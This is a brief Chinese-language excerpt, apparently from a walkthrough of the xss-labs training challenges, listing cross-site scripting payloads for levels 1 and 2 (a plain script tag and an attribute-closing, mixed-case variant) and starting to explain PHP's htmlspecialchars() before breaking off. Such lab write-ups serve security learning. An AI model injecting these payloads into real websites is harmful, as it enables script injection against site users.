xss-labs(1-20关)
level1直接构造
1<script>alert(1)</script>
level2闭合构成
11"><ScRipt>alert(1)</ScRipt>
level3
PHP htmlspecialchars() 函数
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
预定义的字符是:& (和号)成为 &amp“ (双引号)成为 &quot‘ (单引号)成为...
more...

